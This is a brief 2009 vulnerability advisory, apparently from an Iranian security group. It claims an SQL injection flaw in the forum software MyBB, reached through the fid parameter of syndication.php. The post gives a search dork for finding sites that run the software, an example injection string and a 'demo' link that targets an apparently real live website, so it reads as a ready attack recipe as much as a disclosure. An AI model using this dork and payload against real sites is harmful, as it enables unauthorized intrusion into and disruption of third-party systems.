NEW VULN IN MYBB
((In The Name Of GOD))
---------------------------------------
Founder : iman_taktaz from IRAN
Home : http://www.ashiyane.org
email : [email protected]
Special Thx : Behrooz_ice & my teachers in Ashiyane Digital Security Team
Today is : 11 June 2009
-------------------------------
Description:
Vendor:http://www.mybboard.net/
------------------------------
MyBB SQL Error
-->TESTED ON : firefox 3
-->DORK : "Copyright © 2009 MyBB Group. All rights reserved."
-->CATEGORY : SQL INJECTION
-->BUG : remote : syndication.php?fid=[SQL code][etc]
-->Reported Bug date : 2009-06-11
-->Fixed bug date : Not fixed
-->Example : http://localHost/path/syndication.php?fid=[SQL
code][etc]
-->SQL code : 13&limit=-99999
demo:
-->http://www.msat4u.com/ms/syndication.php?fid=13&limit=-99999
------------------------------